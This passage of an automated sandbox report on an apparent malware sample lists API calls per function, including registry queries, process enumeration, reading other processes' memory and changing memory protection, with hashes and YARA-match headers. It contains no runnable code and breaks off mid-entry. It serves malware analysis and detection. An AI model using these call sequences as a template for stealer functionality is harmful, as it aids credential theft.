                                                              • Instruction ID: 354f1ef787fb4e831f0678a257d43b4e33f8629802066180dc86671d5d6e7301
                                                              • Opcode Fuzzy Hash: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
                                                              • Instruction Fuzzy Hash: A0118272A44204AFD714CF94DC45FABBB7DEB48711F00411AFA05D3280DB7459048BE1
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 00406E40
                                                              • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00406EBB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heapmemcpy$AllocProcess
                                                              • String ID: @
                                                              • API String ID: 1643994569-2766056989
                                                              • Opcode ID: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
                                                              • Instruction ID: b28c2e2eafd009aece7dfa75dd6d3a6e0d6a1e6899dabcaa8fc792e54f3dbcc7
                                                              • Opcode Fuzzy Hash: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
                                                              • Instruction Fuzzy Hash: 9C1161706007129BEB258B61DC84BB773E4EB40701F454439EA47DB684FFB8D950CB99
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02492B2C
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02492B33
                                                              • RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02492AB0), ref: 02492B52
                                                              • RegQueryValueExA.ADVAPI32(02492AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 02492B6C
                                                              • RegCloseKey.ADVAPI32(02492AB0), ref: 02492B76
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                              • String ID:
                                                              • API String ID: 3225020163-0
                                                              • Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                              • Instruction ID: 9118c2f5687a0e463d3eaf966c11d5524cdc94f89dd9a497208157924886e21e
                                                              • Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
                                                              • Instruction Fuzzy Hash: CB019A79A00318BFE714CFA09C59FEB7BADAB48755F200099FE4597241EBB059088BE0
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0247127C
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02471283
                                                              • RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024712A0
                                                              • RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024712BA
                                                              • RegCloseKey.ADVAPI32(?), ref: 024712C4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                              • String ID:
                                                              • API String ID: 3225020163-0
                                                              • Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                              • Instruction ID: 29463fc66a7897856d0f4d0595b6744f01c3eb5b60c67cd9ae1afc9250f9b2de
                                                              • Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                              • Instruction Fuzzy Hash: 05F09075A40308BFD7049BA09C4DFEB7B7DEB04755F100059BE09E2280D7B05A048BE0
                                                              APIs
                                                              • __getptd.LIBCMT ref: 02499274
                                                                • Part of subcall function 02498A96: __getptd_noexit.LIBCMT ref: 02498A99
                                                                • Part of subcall function 02498A96: __amsg_exit.LIBCMT ref: 02498AA6
                                                              • __getptd.LIBCMT ref: 0249928B
                                                              • __amsg_exit.LIBCMT ref: 02499299
                                                              • __lock.LIBCMT ref: 024992A9
                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 024992BD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                              • String ID:
                                                              • API String ID: 938513278-0
                                                              • Opcode ID: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
                                                              • Instruction ID: e37bd649f4c70c864c30a52f60c4587755973e7b5384e67761dad9860d28a359
                                                              • Opcode Fuzzy Hash: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
                                                              • Instruction Fuzzy Hash: E8F0B4729057009FDF20BBBA9C05B4E7FE1AF00724F14050FD4056B2C0DB6459409F59
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
                                                              • lstrcpy.KERNEL32(00000000,009E8D40), ref: 00423E6F
                                                              • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$SystemTime
                                                              • String ID: *M@
                                                              • API String ID: 684065273-4186991356
                                                              • Opcode ID: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
                                                              • Instruction ID: b70439790c50c5c6328432dc7e4028cf2044113f60d486d5e56dbf02b5324992
                                                              • Opcode Fuzzy Hash: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
                                                              • Instruction Fuzzy Hash: 76418D31E012158FDB14CF29E984666BBF5FF08315B4A80AAE845DB3A2C779DD42CF94
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00417D14
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00417D2F
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,004091B6,?,?,?,?,00000000,?,00001000,?), ref: 00417D84
                                                                • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
                                                                • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
                                                                • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417E11
                                                                • Part of subcall function 00417DC0: memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Xinvalid_argumentstd::_$memcpy
                                                              • String ID: string too long
                                                              • API String ID: 2304785028-2556327735
                                                              • Opcode ID: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
                                                              • Instruction ID: cceaebfc163d96aa0f8494b9eac0357faa14b69c3768ea23588e1796d2ee1bc6
                                                              • Opcode Fuzzy Hash: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
                                                              • Instruction Fuzzy Hash: 0F31E5723086148BD7249E6CF880ABBF7F9EF91764B204A2BF14687741D775988183ED
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248F27A
                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 0248F295
                                                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 0248F2F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID: ERROR
                                                              • API String ID: 3722407311-2861137601
                                                              • Opcode ID: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
                                                              • Instruction ID: 7fdd692efc57ebbc6c559d0db65a8c0fc26cc8d473dbb908a609bfbb5d09536f
                                                              • Opcode Fuzzy Hash: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
                                                              • Instruction Fuzzy Hash: 11213E706201969BCB24FF7ACC44ADE3BE5AF04308F00442AEC59DBA01DB75D804DB91
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00408767
                                                                • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                                • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                              • String ID: vector<T> too long$yxxx$yxxx
                                                              • API String ID: 2884196479-1517697755
                                                              • Opcode ID: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
                                                              • Instruction ID: e0d1b7fbc79543eee78ba1c3596c29abb19376f5ed5f905b3ee67b4588712001
                                                              • Opcode Fuzzy Hash: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
                                                              • Instruction Fuzzy Hash: 74F09027B100310BC314A43E9E8405FA94657E539037AD77AE986FF38DEC39EC8281D9
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C387
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID:
                                                              • API String ID: 3722407311-0
                                                              • Opcode ID: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
                                                              • Instruction ID: 6bdd926fd0f99392b899760fcf4174a374bb31b20284df3e262ebf43a2f8b2df
                                                              • Opcode Fuzzy Hash: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
                                                              • Instruction Fuzzy Hash: 32319E70E10255DBDB24FFB5DC88AAE7BF6AB45308F04406BD811A7251D7B4C942DFA4
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248F0A6
                                                              • lstrlen.KERNEL32(00000000), ref: 0248F0B4
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248F0DB
                                                              • lstrlen.KERNEL32(00000000), ref: 0248F0E2
                                                              • lstrcpy.KERNEL32(00000000,00435550), ref: 0248F116
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrlen
                                                              • String ID:
                                                              • API String ID: 367037083-0
                                                              • Opcode ID: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
                                                              • Instruction ID: c200e2374b29e6d9aadfe5a6d7574f45b55c89967480385ea400720eea4b5942
                                                              • Opcode Fuzzy Hash: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
                                                              • Instruction Fuzzy Hash: 7031BF71A005A49FC721FF39DC84EDE7BA6AF01308F41442AEC54DBA12DB64D809DF94
                                                              APIs
                                                                • Part of subcall function 02497477: lstrcpy.KERNEL32(00000000,ERROR), ref: 02497495
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02493C9D
                                                              • Process32First.KERNEL32(00000000,00000128), ref: 02493CB0
                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02493CC6
                                                                • Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
                                                                • Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
                                                                • Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0
                                                                • Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545
                                                              • CloseHandle.KERNEL32(00000000), ref: 02493DFE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                              • String ID:
                                                              • API String ID: 1066202413-0
                                                              • Opcode ID: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
                                                              • Instruction ID: 51bd2a5da9ad3ce96741125201c18a0b6dba78b4a8d0c1b8b93f2ce4e7d5e55d
                                                              • Opcode Fuzzy Hash: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
                                                              • Instruction Fuzzy Hash: F481E870900215CFCB15CF18D948B96BBB6BB45329F29C1EEE4095B3A2D776D882CF90
                                                              APIs
                                                              • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 02492469
                                                              • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02492545
                                                              • VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 024925A7
                                                              • ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02492686), ref: 024925B9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MemoryProcessRead$QueryVirtual
                                                              • String ID:
                                                              • API String ID: 268806267-0
                                                              • Opcode ID: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
                                                              • Instruction ID: 455dff00fa8e398c9d0d0bcabe3bab3579252fa7b122ae86091dc49db69f7186
                                                              • Opcode Fuzzy Hash: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
                                                              • Instruction Fuzzy Hash: DE418171A00219ABDF20CFA4D994BAF7BB6FB85724F14852AED15EB340D374D941CB90
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02474C22
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02474C29
                                                              • strlen.MSVCRT ref: 02474CB6
                                                              • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 02474D37
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocateProcessProtectVirtualstrlen
                                                              • String ID:
                                                              • API String ID: 2355128949-0
                                                              • Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                              • Instruction ID: 459ea1b4b2cbd155fe06b431f612b06a71d02f0cb14c12ceea49145056625b5b
                                                              • Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
                                                              • Instruction Fuzzy Hash: 8A31E920F4833C7F86206BA56C46BDFBED4DF8E760F389053F51856188C9A86405CEEA
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0248803F
                                                                • Part of subcall function 0249A457: std::exception::exception.LIBCMT ref: 0249A46C
                                                                • Part of subcall function 0249A457: __CxxThrowException@8.LIBCMT ref: 0249A481
                                                                • Part of subcall function 0249A457: std::exception::exception.LIBCMT ref: 0249A492
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0248805D
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02488078
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,02487F61,00000000,?,?,00000000,?,0247941D,?), ref: 024880DB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
                                                              • String ID:
                                                              • API String ID: 285807467-0
                                                              • Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                              • Instruction ID: 38492a9ec0e87f118281fc727f64461155de9ce00ef2b7453d6b40936bf1343d
                                                              • Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                              • Instruction Fuzzy Hash: 8121D5313106048FD725EE2CDD80A2EB7E6EF96714FA14A2FE592CB381D772D8408B95
                                                              APIs
                                                              • strtok_s.MSVCRT ref: 0248836C
                                                              • lstrlen.KERNEL32(00000000), ref: 024883B2
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024883E1
                                                              • StrCmpCA.SHLWAPI(00000000,00435204), ref: 024883F9
                                                              • lstrlen.KERNEL32(00000000), ref: 02488437
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02488466
                                                              • strtok_s.MSVCRT ref: 02488476
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpylstrlenstrtok_s
                                                              • String ID:
                                                              • API String ID: 3280532728-0
                                                              • Opcode ID: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
                                                              • Instruction ID: 56724283be1fd5afd4c13a7dcb5bdf71d6efa9c7df6337d9adb98bc71c2b976c
                                                              • Opcode Fuzzy Hash: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
                                                              • Instruction Fuzzy Hash: 602123729102099BC722EF68DC48B9EBBB4EF00714F14419EEC599B381EB75D942CB90
                                                              APIs
                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0248EF7B
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248EFAA
                                                              • lstrcat.KERNEL32(?,00000000), ref: 0248EFB8
                                                              • lstrcat.KERNEL32(?,00638930), ref: 0248EFD3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat$FolderPathlstrcpy
                                                              • String ID:
                                                              • API String ID: 818526691-0
                                                              • Opcode ID: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
                                                              • Instruction ID: 4fd0debc260760dcde2f13e2794112793d7f39610e55c1e880eb0ad965d30c7b
                                                              • Opcode Fuzzy Hash: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
                                                              • Instruction Fuzzy Hash: 1E3142B1A00158EBDB10EF74DC44BED77B5AF44304F10446AFA9597251DBB09E449F94
                                                              APIs
                                                              • strtok_s.MSVCRT ref: 0248CBCC
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248CC09
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248CC38
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$strtok_s
                                                              • String ID:
                                                              • API String ID: 2610293679-0
                                                              • Opcode ID: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
                                                              • Instruction ID: 059bd636cc4b983fcf42dca19eb1c7c9dc9265bfb34a55e93d63cfbb0507272e
                                                              • Opcode Fuzzy Hash: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
                                                              • Instruction Fuzzy Hash: 3E21CE71E10218AFDB20EFB5DC84AEEBBB4EB08308F04006BD815E7211D774CA469BA4
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcessstrtok_s
                                                              • String ID:
                                                              • API String ID: 3407564107-0
                                                              • Opcode ID: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
                                                              • Instruction ID: f63c5fd41ce7f4d16ce719a85b3c4c0cd4f6449886e8e69d99f125465a570084
                                                              • Opcode Fuzzy Hash: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
                                                              • Instruction Fuzzy Hash: B9015675910209FBDB11DFA4DC848AE77B9DB84304B40447AF90697200D7759A458BA5
                                                              APIs
                                                              • StrCmpCA.SHLWAPI(?,00435204), ref: 0248CCCA
                                                              • StrCmpCA.SHLWAPI(?,00432240,?,00435204), ref: 0248CCE1
                                                              • StrCmpCA.SHLWAPI(?,00435208,?,00432240,?,00435204), ref: 0248CCF8
                                                              • strtok_s.MSVCRT ref: 0248CDEE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strtok_s
                                                              • String ID:
                                                              • API String ID: 3330995566-0
                                                              • Opcode ID: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
                                                              • Instruction ID: 2abcea882e12489be174242b06be196f6369e8e50bbdeeb640da04fb4c27344c
